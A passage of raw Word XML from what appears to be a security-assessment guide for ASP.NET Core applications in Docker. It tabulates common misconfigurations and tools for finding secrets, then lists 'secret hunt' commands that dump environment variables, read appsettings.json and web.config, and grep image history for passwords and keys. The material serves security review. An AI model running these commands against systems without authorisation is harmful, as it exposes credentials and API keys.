          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="10370533">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7357C43F">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0910A22C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>ASPNETCORE_ENVIRONMENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E2A1A12">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Development in production</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6D5F9177">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29CF3525">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D368816">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>appsettings.json, env vars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="000F7DF3">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Password=sa123 in plaintext</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3356F906">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="065C794C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Machine Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24A60B7D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>web.config, appsettings.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11137AB4">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Static key for ViewState</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="20A41529">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A9C2669">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>API Keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="437A4BB5">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Dockerfile, compose, env</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45B7361F">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Hardcoded Stripe/AWS keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2FAC59D0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51CC8DD3">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Debug mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F69BFE1">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>ASPNETCORE_DETAILEDERRORS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="06F2E79E">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>true exposing stack traces</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="01FE49FF">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Tools:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2645"/>
        <w:gridCol w:w="5343"/>
      </w:tblGrid>
      <w:tr w14:paraId="1B61F236">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13696F6A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4EE3FCB1">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3C6458BA">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1795C847">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>grep</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t xml:space="preserve"> (inside container)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68310A48">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>env | grep -i key</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="38852459">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70ACB8F9">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>truffleHog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D412DC2">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Scan for secrets in Docker image layers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="518804F7">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66D03F00">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>dive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E0DC694">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Analyze Docker image layers for leaked secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7C935931">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6A335277">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>dotPeek / ILSpy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4DEF9E29">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Decompile .NET assemblies if accessible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BD1A5E3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Example Secret Hunt Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D5BD51">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CCD40C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t># Inside container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEFA182">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>env | sort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1613C734">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>cat /app/appsettings.json 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCDDA9A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>find / -name "web.config" -exec cat {} \; 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67480F13">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52773088">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t># From host on image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418DA913">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>docker run --rm -it &lt;image&gt; cat /app/appsettings.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729C054E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>docker history --no-trunc &lt;image&gt; | grep -i "pass\|key"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66848582">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Tool Summary Table</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1723"/>
        <w:gridCol w:w="4127"/>
        <w:gridCol w:w="2546"/>
      </w:tblGrid>
      <w:tr w14:paraId="682D2CEB">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0502B5F4">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="540B106E">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Primary Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
